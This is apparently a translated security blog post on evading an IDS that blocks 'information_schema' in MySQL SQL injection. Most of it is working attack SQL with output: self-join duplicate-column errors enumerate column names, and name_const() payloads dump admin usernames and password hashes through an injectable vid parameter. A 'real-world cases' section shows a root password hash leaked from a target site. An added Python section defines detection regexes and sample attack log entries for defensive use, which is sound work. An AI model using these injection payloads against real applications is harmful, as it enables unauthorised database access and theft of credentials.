Original article: Bypassing IDS filtering of information_schema to continue injecting
// Using MySQL error messages to expose field names
mysql> select * from (select * from user a join user b) c;
ERROR 1060 (42S21): Duplicate column name 'host'
mysql> select * from (select * from user a join user b using (host)) c;
ERROR 1060 (42S21): Duplicate column name 'user'
mysql> select * from (select * from user a join user b using (host, user)) c;
ERROR 1060 (42S21): Duplicate column name 'password'
// Obtaining information
// It may be a version problem; I could not get it to work.
mysql> select name_const((select host from user limit 0,1), 0);
ERROR 1210 (HY000): Incorrect arguments to NAME_CONST
It seems that the arguments to name_const must be constants.
I will try again some other time.
Update: it is clearly a version problem (in the higher version the arguments must all be constants, otherwise an error is reported). The portability of this method does not look very good.
mysql> select version();
+---------------------+
| version()           |
+---------------------+
| 5.0.27-community-nt |
+---------------------+
1 row in set (0.00 sec)

mysql> select name_const((select user()), 0);
+----------------+
| root@localhost |
+----------------+
|              0 |
+----------------+
1 row in set (0.00 sec)
---
mysql> select version();
+------------------+
| version()        |
+------------------+
| 5.1.35-community |
+------------------+
1 row in set (0.00 sec)

mysql> select name_const((select version()), 0);
ERROR 1210 (HY000): Incorrect arguments to NAME_CONST
During a penetration test I came across a website whose IDS filtered information_schema, and as a result I got stuck at that point. The day before yesterday I read an article and found a bypass method. I tested it locally, discussed it with yuanniu, and finally constructed the statements with yuanniu's help. I then went back and looked at the site again; now that my buddy has published the method, I am publishing this too.
1. Build a local test table
mysql> create table users (id int, name varchar(20), passwd varchar(32));
Query OK, 0 rows affected (0.04 sec)

mysql> insert into users values (1, 'mickey', '827ccb0eea8a706c4c34a16891f84e7b');
Query OK, 1 row affected (0.00 sec)

mysql> create table news (is_admin int(1), id int(2), title varchar(100), date date);
Query OK, 0 rows affected (0.00 sec)

mysql> insert into news values (1, 1, 'hello, mickey', now());
Query OK, 1 row affected, 1 warning (0.00 sec)
2. Brute-forcing column names
mysql> select * from (select * from users as a join news as b) as c;
ERROR 1060 (42S21): Duplicate column name 'id'
mysql> select * from (select * from users a join users b using (id)) c;
ERROR 1060 (42S21): Duplicate column name 'name'
mysql> select * from (select * from users a join users b using (id, name)) c;
ERROR 1060 (42S21): Duplicate column name 'passwd'
mysql> select * from (select * from users a join users b using (id, name, passwd)) c;
+------+--------+----------------------------------+
| id   | name   | passwd                           |
+------+--------+----------------------------------+
|    1 | mickey | 827ccb0eea8a706c4c34a16891f84e7b |
+------+--------+----------------------------------+
1 row in set (0.00 sec)

mysql> select * from (select * from news a join news b using (id)) as c;
ERROR 1060 (42S21): Duplicate column name 'is_admin'
mysql> select * from (select * from news a join news b using (id, is_admin)) as c;
ERROR 1060 (42S21): Duplicate column name 'title'
mysql> select * from (select * from news a join news b using (id, is_admin, title)) as c;
ERROR 1060 (42S21): Duplicate column name 'date'
mysql> select * from (select * from news a join news b using (id, is_admin, title, date)) as c;
+----------+------+---------------+------------+
| is_admin | id   | title         | date       |
+----------+------+---------------+------------+
|        1 |    1 | hello, mickey | 2010-05-08 |
+----------+------+---------------+------------+
1 row in set (0.00 sec)
3. Brute-forcing field values (this statement was constructed by yuanniu)
Brute-force statement:
select * from cms_votes where vid=1 and exists
(select * from (select * from (select name_const((select group_concat(concat(uid,0x7c,pwd)) from admin), 'fuck')) a join (select name_const((select group_concat(concat(uid,0x7c,pwd)) from admin), 'fuck')) b) c);
Applied:
mysql> select * from cms_votes where vid=1 and exists
    -> (select * from (select * from (select name_const((select group_concat(concat(uid,0x7c,pwd)) from admin), 'fuck')) a join (select name_const((select group_concat(concat(uid,0x7c,pwd)) from admin), 'fuck')) b) c);
ERROR 1060 (42S21): Duplicate column name 'ylbhz|fuck,mickey|fucked'
mysql> select * from cms_votes where vid=1 and exists
    -> (select * from (select * from (select name_const(@@version,0)) a join (select name_const(@@version,0)) b) c);
ERROR 1060 (42S21): Duplicate column name '5.0.45-community-nt'
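The whole point of sections 2 and 3 is that the request never contains the string information_schema, so an IDS that keys on that word sees nothing. What the technique cannot hide is its shape: a derived table that self-joins and selects *, a name_const() whose first argument is a subquery or a @@variable rather than a literal, and, on the way back, the raw "Duplicate column name" error reaching the client. The Python script below is an added example written for this page, not code from the original article or its author; it runs those three checks over a few constructed request/response pairs modelled on the statements above. The function names (classify_request, classify_response, scan_log), the signal labels and the sample log entries are all my own.

```python
"""Flag the traces left by the name_const / duplicate-column-name trick.

Added example for this page (not the article's code). Works on
URL-encoded query strings and on the response bodies an application
sent back, so it can be run over a web server log offline.
"""
import re
import urllib.parse

# Signal 1: a derived table whose body is "select * from ... join ...".
# Both the column-enumeration statements (section 2) and the
# name_const statements (section 3) have this shape. Ordinary reporting
# SQL can look like this too, so treat it as a correlation signal.
SELF_JOIN_RE = re.compile(
    r"from\s*\(\s*select\s+\*\s+from\b[^;]*?\bjoin\b",
    re.IGNORECASE | re.DOTALL,
)
# Signal 2: name_const() fed a subquery or a server variable instead of
# the constant it is designed to take.
NAME_CONST_RE = re.compile(
    r"name_const\s*\(\s*(?:\(\s*select\b|@@\w+)", re.IGNORECASE
)
# Signal 3: the MySQL error text escaping into the HTTP response.
ERROR_LEAK_RE = re.compile(r"duplicate column name\s*'", re.IGNORECASE)


def classify_request(raw_query_string):
    """Return the set of signal labels found in one URL query string."""
    decoded = urllib.parse.unquote_plus(raw_query_string)
    normalized = re.sub(r"\s+", " ", decoded)
    signals = set()
    if SELF_JOIN_RE.search(normalized):
        signals.add("self_join_enumeration")
    if NAME_CONST_RE.search(normalized):
        signals.add("name_const_non_constant")
    if "information_schema" in normalized.lower():
        signals.add("information_schema")
    return signals


def classify_response(body):
    """Return {'error_leak'} if a raw duplicate-column error was returned."""
    return {"error_leak"} if ERROR_LEAK_RE.search(body) else set()


def scan_log(entries):
    """entries: iterable of (query_string, response_body) pairs.

    Returns one finding per entry that shows at least one signal, with
    the signals sorted so the result is stable.
    """
    findings = []
    for index, (query_string, body) in enumerate(entries):
        signals = classify_request(query_string) | classify_response(body)
        if signals:
            findings.append({"entry": index, "signals": sorted(signals)})
    return findings


# Constructed sample traffic (hypothetical; modelled on sections 2 and 3).
# Entry 1 is the @@version probe, entry 2 the column-enumeration step,
# entry 3 a plain information_schema query that the IDS already catches.
SAMPLE_LOG = [
    ("vid=1", "<html>thanks for voting</html>"),
    ("vid=1+and+exists(select+*+from+(select+*+from+(select+name_const"
     "(%40%40version,0))+a+join+(select+name_const(%40%40version,0))+b)+c)",
     "ERROR 1060 (42S21): Duplicate column name '5.0.45-community-nt'"),
    ("vid=1+and+exists(select+*+from+(select+*+from+users+a+join+users+b"
     "+using+(id))+c)",
     "ERROR 1060 (42S21): Duplicate column name 'name'"),
    ("vid=1+and+(select+count(*)+from+information_schema.tables)",
     "<html>blocked by ids</html>"),
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The response-side check is the one worth keeping even if the request regexes are tuned away as noisy: every statement in sections 2 and 3 only yields data because the application echoes the database error to the client. An application that catches the database exception and returns a generic message closes that channel regardless of what the IDS filters, and a single "Duplicate column name" string in an HTTP response is a far more specific indicator than any keyword in the request.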
4. Real-world cases
Column name '5.0.27-community-nt' error: Duplicate column name '5.0.27-community-nt'
Column name 'root*b7b1a4f45d9e638faeb750f0a99935634cff6c82'
Error: Duplicate column name 'root*b7b1a4f45d9e638faeb750f0a99935634cff6c82'
Finally, I would like to thank Mo NIU for his guidance.